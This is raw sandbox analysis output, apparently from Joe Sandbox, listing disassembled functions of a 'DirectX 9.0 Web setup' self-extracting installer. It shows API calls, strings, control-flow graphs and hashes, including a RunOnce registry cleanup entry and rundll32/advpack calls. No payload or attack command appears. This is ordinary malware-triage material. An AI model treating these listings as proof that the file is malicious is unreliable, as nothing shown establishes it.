                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                • API String ID: 1932099537-1383298736
                                                                                                • Opcode ID: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction ID: f0cbcbf04177e37c30e3133f67ae01d03030f470cf72cf61e2aa79d8b69a16e6
                                                                                                • Opcode Fuzzy Hash: 9cfc3f925ef709eea2b6e4c056a8937429d4c1d82baa32382744840923556eea
                                                                                                • Instruction Fuzzy Hash: 47916071A00249BAFB23DBA4CD49FDE7BBCAB45700F144195F6C5E6080E7B5DA808B60
                                                                                                Function 0100198B Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 169registrystringlibraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,00000000,?,00000001,7591F530), ref: 010019E4
                                                                                                • wsprintfA.USER32 ref: 01001A09
                                                                                                • RegQueryValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000000,00000000,?), ref: 01001A1D
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01001A37
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001A56
                                                                                                • LoadLibraryA.KERNELBASE(?,?,advpack.dll), ref: 01001A74
                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01001A8B
                                                                                                • FreeLibrary.KERNELBASE(?), ref: 01001A9F
                                                                                                • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 01001AB1
                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01001AD7
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001AE2
                                                                                                • LocalAlloc.KERNEL32(00000040,00000050), ref: 01001AEB
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000104), ref: 01001B19
                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,000004B5,00000000,00000000,00000010,00000000), ref: 01001B26
                                                                                                • wsprintfA.USER32 ref: 01001B59
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01001B63
                                                                                                • RegSetValueExA.KERNELBASE(00000000,wextract_cleanup0,00000000,00000001,00000000,00000001), ref: 01001B70
                                                                                                • RegCloseKey.KERNELBASE(00000000), ref: 01001B79
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01001B80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Closelstrlen$DirectoryFreeLibraryLocalSystemValuewsprintf$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                • API String ID: 3084642846-1709460465
                                                                                                • Opcode ID: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction ID: bcd9c67c776e79ec80fa89b258506c9e143caafd4bb2848af9ab02cf1fab0281
                                                                                                • Opcode Fuzzy Hash: c9262a911cf3084d63b0fa5f4be99a77ebbc8ce96a0a011a0b05c5970966fbed
                                                                                                • Instruction Fuzzy Hash: 31514071A40218BBEB229BA5DD49EDE7BBCEB08700F004495F685E6085D7B9DA41CF90
                                                                                                Function 01004C18 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 172synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 278 1004c18-1004c72 call 1002a34 281 1004c78-1004c7d 278->281 282 1004e3d-1004e42 278->282 281->282 283 1004c83-1004cac CreateEventA SetEvent call 1002a34 281->283 284 1004e47-1004e48 call 10038cc 282->284 289 1004cd5-1004cef call 10038cc 283->289 290 1004cae-1004cb5 283->290 288 1004e4d 284->288 291 1004e4f-1004e53 288->291 289->288 293 1004d65-1004d75 call 10030a7 290->293 294 1004cbb-1004cd3 call 1002a34 290->294 300 1004d86-1004d8c 293->300 301 1004d77-1004d81 293->301 294->289 302 1004cf4-1004d0a CreateMutexA 294->302 303 1004d9d-1004daf FindResourceA 300->303 304 1004d8e-1004d98 call 1001c7f 300->304 301->284 302->293 305 1004d0c-1004d17 GetLastError 302->305 308 1004db1-1004dbb LoadResource 303->308 309 1004dbe-1004dc4 303->309 304->288 305->293 307 1004d19-1004d20 305->307 311 1004d22-1004d32 call 10038cc 307->311 312 1004d34-1004d48 call 10038cc 307->312 308->309 313 1004dc6 #17 309->313 314 1004dcc-1004dd2 309->314 322 1004d4a-1004d60 CloseHandle 311->322 312->293 312->322 313->314 317 1004dd4-1004dde call 10041cd 314->317 318 1004e39-1004e3b 314->318 317->288 324 1004de0-1004de9 317->324 318->291 322->288 325 1004df7-1004dfe 324->325 326 1004deb-1004def 324->326 325->318 328 1004e00-1004e07 325->328 326->325 327 1004df1-1004df5 326->327 327->318 327->325 328->318 329 1004e09-1004e10 call 100168b 328->329 329->318 332 1004e12-1004e37 call 1004161 329->332 332->288 332->318
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01004C87
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 01004C93
                                                                                                  • Part of subcall function 01002A34: FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,INSTANCECHECK,?,00000104,EXTRACTOPT,0100B494,00000004,?,00000000), ref: 01004CFD
                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 01004D0C
                                                                                                • FindResourceA.KERNEL32(00000000,VERCHECK,0000000A), ref: 01004DA7
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 01004DB5
                                                                                                • #17.COMCTL32(?,00000000), ref: 01004DC6
                                                                                                • CloseHandle.KERNEL32(00000000,00000524,DirectX 9.0 Web setup,00000000,00000020,00000004,?,00000000), ref: 01004D50
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$CreateEventLoad$CloseErrorFreeHandleLastLockMessageMutexSizeof
                                                                                                • String ID: DirectX 9.0 Web setup$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                • API String ID: 612345255-3861042123
                                                                                                • Opcode ID: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction ID: 917ad5cb818e3c264ff7b4ff8797261597b45a6a0e97e5d7e7b17e1e85fa401a
                                                                                                • Opcode Fuzzy Hash: 6e61b948a8d2d4fbc5d951fd4a04286bee1605d2895dff06b8bbb81afb43d88a
                                                                                                • Instruction Fuzzy Hash: 7C5127B0644385BAF7336B289D89FAA3B9DEB55744F000465F7C5DA1C5CBB98E808728
                                                                                                Function 01003F0D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 181COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,759183C0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01003F37
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000), ref: 01003F46
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003F29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1611563598-1193786559
                                                                                                • Opcode ID: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction ID: a82620e449f5b1383de194113fdcc55ed895d330ee11bc6e5bf4c8a97130a73d
                                                                                                • Opcode Fuzzy Hash: 7272f09d9cc4f95465a0350aed80e63b7b027015254899d99047417d38069267
                                                                                                • Instruction Fuzzy Hash: 1351A0B1A00209BEFB23DB64CC85EFE7B6CAB08344F0044A5B7C5E60C5D6759E858B64
                                                                                                Function 01004B1A Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 83stringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 391 1004b1a-1004b2a 392 1004ba7-1004bb0 lstrcpyA 391->392 393 1004b2c-1004b36 call 1002f7a 391->393 395 1004bb6-1004bbe call 1003e60 392->395 396 1004b3b-1004b3d 393->396 404 1004bc0-1004bca CreateDirectoryA 395->404 405 1004bd6-1004bdb call 1003f0d 395->405 398 1004c10 396->398 399 1004b43-1004b5d lstrcpyA 396->399 401 1004c12-1004c15 398->401 402 1004b9a-1004ba5 call 1005b32 399->402 403 1004b5f-1004b6f GetSystemInfo 399->403 402->395 406 1004b71-1004b72 403->406 407 1004b8f 403->407 408 1004bcc 404->408 409 1004bef-1004bf9 call 1003547 404->409 415 1004be0-1004be2 405->415 413 1004b74-1004b75 406->413 414 1004b88-1004b8d 406->414 416 1004b94-1004b95 call 1005b32 407->416 408->405 409->398 418 1004b81-1004b86 413->418 419 1004b77-1004b78 413->419 414->416 420 1004be4-1004bed 415->420 421 1004bfb-1004c01 415->421 416->402 418->416 419->402 424 1004b7a-1004b7f 419->424 420->401 421->398 425 1004c03-1004c0a RemoveDirectoryA 421->425 424->416 425->398
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004B50
                                                                                                • GetSystemInfo.KERNEL32(?), ref: 01004B63
                                                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 01004BB0
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01004BC2
                                                                                                  • Part of subcall function 01002F7A: wsprintfA.USER32 ref: 01002F9A
                                                                                                  • Part of subcall function 01002F7A: lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01002F7A: RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                  • Part of subcall function 01002F7A: GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                  • Part of subcall function 01002F7A: GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                  • Part of subcall function 01002F7A: DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                  • Part of subcall function 01002F7A: CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01004C0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$Filelstrcpy$CreateRemove$AttributesDeleteInfoNameSystemTempwsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                • API String ID: 2618030033-3703068183
                                                                                                • Opcode ID: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction ID: 863f2b1f4f4a5febeb1d47ca0d15cb2489539e343ca057a3309e34f4a0df478a
                                                                                                • Opcode Fuzzy Hash: d5e147964fd9a8698458917d450e8c8beedf36294136644907e6467125a92c41
                                                                                                • Instruction Fuzzy Hash: 5421A131505B19ABFB639F699C44FEA3ADCAB05385F4000A9F7C5E10C4DB39C941CB69
                                                                                                Function 01005E67 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 01005E90
                                                                                                • MulDiv.KERNEL32(00000000,00000000,00000400), ref: 01005EAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DiskFreeSpace
                                                                                                • String ID:
                                                                                                • API String ID: 1705453755-0
                                                                                                • Opcode ID: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction ID: 8a5b4a76b2f8f35f795143fc95d6367980ae63d8bc1465d256248162a8adc07a
                                                                                                • Opcode Fuzzy Hash: 81f4c4850e346c9080ac81259ce3d45f8a1d835a9eef6e91ffedc07ec51b2c28
                                                                                                • Instruction Fuzzy Hash: C3F0E776D01218BFEF05DF94C844BEEBBBCEF14316F008496AA51A6180D775AB04CF90
                                                                                                Function 01005288 Relevance: 38.8, APIs: 11, Strings: 11, Instructions: 269stringlibraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 90 1005288-10052ab 91 10052e8-10052f0 90->91 92 10052ad-10052c0 call 1002a34 90->92 94 10052f3-100530d 91->94 98 10052c2-10052c5 92->98 99 10052c7-10052e3 call 10038cc 92->99 96 1005400-1005414 lstrcpyA 94->96 97 1005313-1005325 call 1002a34 94->97 100 1005415-1005418 96->100 109 100532b-100532e 97->109 110 10053df-10053ef call 10038cc 97->110 98->91 98->99 113 10055b7-10055bc 99->113 103 100545a-1005470 call 10022ff 100->103 104 100541a-1005432 call 1002a34 100->104 118 1005472-1005475 103->118 119 10053f9-10053fb 103->119 104->110 121 1005434-100543a 104->121 109->110 115 1005334-100533a 109->115 110->119 116 1005342-1005346 115->116 117 100533c-1005340 115->117 123 1005350-1005354 116->123 124 1005348-100534e 116->124 122 100535c 117->122 125 1005495-1005498 118->125 126 1005477-100547e 118->126 127 10055b5-10055b6 119->127 128 1005440-1005454 lstrcmpiA 121->128 129 10055a6-10055ac 121->129 131 100535f-1005362 122->131 130 1005356 123->130 123->131 124->122 135 100557d-1005584 call 1004560 125->135 136 100549e-10054a4 125->136 126->125 132 1005480-1005486 126->132 127->113 128->103 128->129 133 10055b3 129->133 134 10055ae call 1001b8b 129->134 130->122 131->100 140 1005368-1005371 131->140 132->125 138 1005488-100548b 132->138 133->127 134->133 143 1005589-100558b 135->143 141 10054aa-10054ad 136->141 142 10055bd-10055dc call 10038cc LocalFree 136->142 138->136 144 100548d-1005490 call 100198b 138->144 145 1005373-1005375 140->145 146 10053bc-10053bf 140->146 141->135 148 10054b3-10054ba 141->148 142->119 149 1005591-100559d LocalFree 143->149 150 100562c-1005631 LocalFree 143->150 144->125 153 1005380-1005382 145->153 154 1005377-100537e 145->154 146->103 151 10053c5-10053dd call 1002a34 146->151 148->135 156 10054c0-10054ce call 100370f 148->156 149->94 157 10055a3-10055a5 149->157 150->119 151->100 151->110 159 100538b-10053a1 call 1002a34 153->159 160 1005384 153->160 154->159 165 10055e1-10055f5 call 10038cc 156->165 166 10054d4-10054e2 GetProcAddress 156->166 157->129 159->110 171 10053a3-10053b7 lstrcmpiA 159->171 160->159 177 1005612-1005621 LocalFree call 1003547 165->177 168 10055f7-100560c call 10038cc FreeLibrary 166->168 169 10054e8-1005523 166->169 168->177 174 1005525 169->174 175 1005529-1005532 169->175 171->146 172 10053b9 171->172 172->146 174->175 179 1005534 175->179 180 1005538-100553b 175->180 177->119 179->180 182 1005541-100554a 180->182 183 100553d 180->183 185 1005550-1005552 182->185 186 100554c 182->186 183->182 187 1005554 185->187 188 1005558-100556f 185->188 186->185 187->188 190 1005575-100557b FreeLibrary 188->190 191 1005626 FreeLibrary 188->191 190->149 191->150
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,0100BAA2,?,00000000), ref: 0100540C
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 010053AF
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • lstrcmpiA.KERNEL32(?,<None>), ref: 0100544C
                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010054DA
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005575
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 01005594
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C7,00000000,00000000,00000010,00000000,?,?,?,?,00000000), ref: 010055D0
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000004C9,DoInfInstall,00000000,00000010,00000000,?,00000000), ref: 0100560C
                                                                                                • LocalFree.KERNEL32(?,00000000,000004C8,advpack.dll,00000000,00000010,00000000,advpack.dll,?,?,?,?,00000000), ref: 01005615
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 01005626
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0100562F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$Resource$Local$Library$Findlstrcmpi$AddressLoadLockProcSizeoflstrcpy
                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                • API String ID: 770626793-3658801068
                                                                                                • Opcode ID: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction ID: 2f43a83221f47182914e3832709c3c8ca3f90824a361c088b79cbbea01e2dab8
                                                                                                • Opcode Fuzzy Hash: 9bf6c9ac14c3ca6bcf4a5ac89318c0245a048f76e75a5681400d6749ac64c027
                                                                                                • Instruction Fuzzy Hash: ACA1C070A003499BFF23DF65CC85AEE3BA9AB05305F00416AFAC5960D1DBB68984CF24
                                                                                                Function 01005636 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 233stringmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 192 1005636-1005665 call 1002a34 LocalAlloc 195 1005667-100567c call 10038cc call 1003547 192->195 196 1005688-1005692 call 1002a34 192->196 211 1005681-1005683 195->211 201 1005694-10056b5 call 10038cc LocalFree 196->201 202 10056b7-10056c8 lstrcmpA 196->202 201->211 205 10056d0-10056de LocalFree 202->205 206 10056ca 202->206 209 10056e0-10056e2 205->209 210 100571b-1005723 205->210 206->205 214 10056f2-10056f4 209->214 215 10056e4-10056ea 209->215 212 1005729-100572f 210->212 213 10058db-10058f7 call 1004161 210->213 216 10058f9-10058fd 211->216 212->213 217 1005735-1005748 GetTempPathA 212->217 213->216 220 10056f6-1005704 call 1004b1a 214->220 215->214 219 10056ec-10056f0 215->219 221 1005774 217->221 222 100574a-100574e call 1004b1a 217->222 219->220 229 1005706-1005716 call 10038cc 220->229 230 100576d-100576f 220->230 227 100577a-1005788 lstrcpyA 221->227 228 1005753-1005755 222->228 231 100589a-10058a7 227->231 228->230 234 1005757-100575f call 1001f6e 228->234 229->211 230->216 232 100578d-1005799 GetDriveTypeA 231->232 233 10058ad-10058cb GetWindowsDirectoryA call 1003f0d 231->233 236 10057a0-10057b0 GetFileAttributesA 232->236 237 100579b-100579e 232->237 233->227 247 10058d1 233->247 234->221 248 1005761-100576b call 1004b1a 234->248 241 10057b2-10057b5 236->241 242 10057eb-10057fe call 1003f0d 236->242 237->236 237->241 245 10057e0-10057e6 241->245 246 10057b7-10057be 241->246 256 1005800-100580e call 1001f6e 242->256 257 1005823-1005831 call 1001f6e 242->257 245->231 246->245 250 10057c0-10057c7 246->250 254 10058d6-10058d9 247->254 248->221 248->230 250->245 253 10057c9-10057d7 call 1005e13 250->253 253->245 267 10057d9-10057de 253->267 254->216 256->245 264 1005810-1005821 call 1003f0d 256->264 265 1005833-100583f GetWindowsDirectoryA 257->265 266 1005845-1005864 call 1005b32 call 1001f4b 257->266 264->245 264->257 265->266 274 1005874-1005898 SetFileAttributesA lstrcpyA call 1004b1a 266->274 275 1005866-1005872 266->275 267->242 267->245 274->231 274->254 275->231
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,RUNPROGRAM,00000000,00000000,?,00000000), ref: 01005659
                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056BD
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 010056D1
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,RUNPROGRAM,00000000,00000000,?,00000000), ref: 010056A5
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01005740
                                                                                                • lstrcpyA.KERNEL32(?,A:\,?,00000000), ref: 01005786
                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,00000000), ref: 0100578E
                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,00000000), ref: 010057A7
                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,00000000,?,00000000), ref: 010058B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocAttributesDirectoryDriveFileLoadLockMessagePathSizeofTempTypeWindowslstrcmplstrcpy
                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                • API String ID: 535033332-559629209
                                                                                                • Opcode ID: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction ID: 096894b9e67c34d8375bb897499805253a01f20e87239c6fdf17a2f350f7322a
                                                                                                • Opcode Fuzzy Hash: 6850fc883a11cab837c26050fb0a112f3f6a7a0a4a41dfd58cf56b6d104f570a
                                                                                                • Instruction Fuzzy Hash: B661AAB4A40355BAFB3397755D89FEB26ACAB19744F400491FBC9E60C1E6B4C6808F64
                                                                                                Function 01002F7A Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 63filestringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

